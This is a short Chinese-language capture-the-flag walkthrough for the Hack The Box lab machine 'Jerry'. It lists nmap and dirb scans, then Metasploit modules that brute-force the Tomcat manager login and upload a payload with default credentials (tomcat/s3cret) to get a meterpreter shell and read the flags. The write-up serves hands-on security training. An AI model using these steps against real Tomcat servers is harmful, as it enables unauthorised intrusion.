hackthebox网站:https://www.hackthebox.eu
这次我们的靶机叫-Jerry
IP:10.10.10.95
======================================================================================
1.先用nmap对 目标靶机进行扫描
nmap -sC -sV 10.10.10.95
我们可以看到目标机器就只开启了 8080端口,那么我们用浏览器打开看看
然后我检查了这个页面,但是没有管理的账号和密码,也做不了什么。
我们扫一下目录试试看
drib http://10.10.10.95 /usr/share/wordlists/dirb/big.txt
也扫描不到任何有价值的东西
我们打开msfconsole
然后搜索关于tomcat的攻击脚本
然后我们 use /auxiliary/scanner/http/tomcat_mgr_login
然后我们配置下参数
set RHOSTS 10.10.10.95
SET RHPORT 8080
设置完成之后就运行
爆破成功。
然后我们切换另一个攻击模块
exploit/multi/http/tomcat_mgr_upload
然后分别设置下参数
set RHOST 10.10.10.95
set RPORT 8080
set Httpusername tomcat
set Httppassword:s3cret
然后开始攻击,就能建立会话
meterpreter命令查询:http://www.cnblogs.com/backlion/p/9484949.html
我们切换到桌面上看看,桌面上有什么东西
然后cd flags,再ls下看看内容
获取下这个文件内容
注意因为文件名有空格所以需要用双引号包起来。